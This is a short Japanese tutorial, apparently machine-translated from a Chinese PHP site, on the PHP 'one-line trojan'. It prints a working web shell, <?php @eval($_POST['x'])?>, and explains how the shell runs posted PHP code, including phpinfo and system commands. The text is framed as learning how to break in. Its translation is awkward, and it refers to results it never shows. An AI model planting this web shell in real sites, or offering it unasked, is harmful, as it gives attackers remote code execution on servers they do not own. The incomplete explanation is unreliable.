一文のトロイの木馬分析
まず第一に、侵入する方法を学ぶ場合、おそらく 3 種類のトロイの木馬があると考えられます: 大きな馬、小さな馬と一文。
一般的な単語:
<?php @eval($_POST['x'])?>
これが最も一般的です...その構成を見てください。
最初は eval 関数で、次に続きます。パラメーター x を使用して値をポスト送信することにより、まず、eval 関数が何を行うかを見てみましょう。
正式な説明:
eval() 関数は、PHP コードに従って文字列を計算します。
文字列は正当な PHP コードである必要があり、セミコロンで終わる必要があります。
コード文字列内で return ステートメントが呼び出されない場合は、NULL が返されます。コードに解析エラーがある場合、eval() 関数は false を返します。
文法:
eval(phpcode)
簡単に言えば、いくつかの php 関数と php コードを実行できます。これで十分です。
これで理解できます。もっと簡単です。PHP コードを彼の投稿に直接送信したほうが良いと思いませんか?
例: phpinfo() 関数、システム関数など。
#ここにある phpinfo 関数が実行されたことがわかります。
コマンド実行も可能
PHPコードもスムーズに実行可能:
推奨ビデオ チュートリアル: PHP ビデオ チュートリアル
以上がPHP で画像型トロイの木馬を一文で解析する方法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。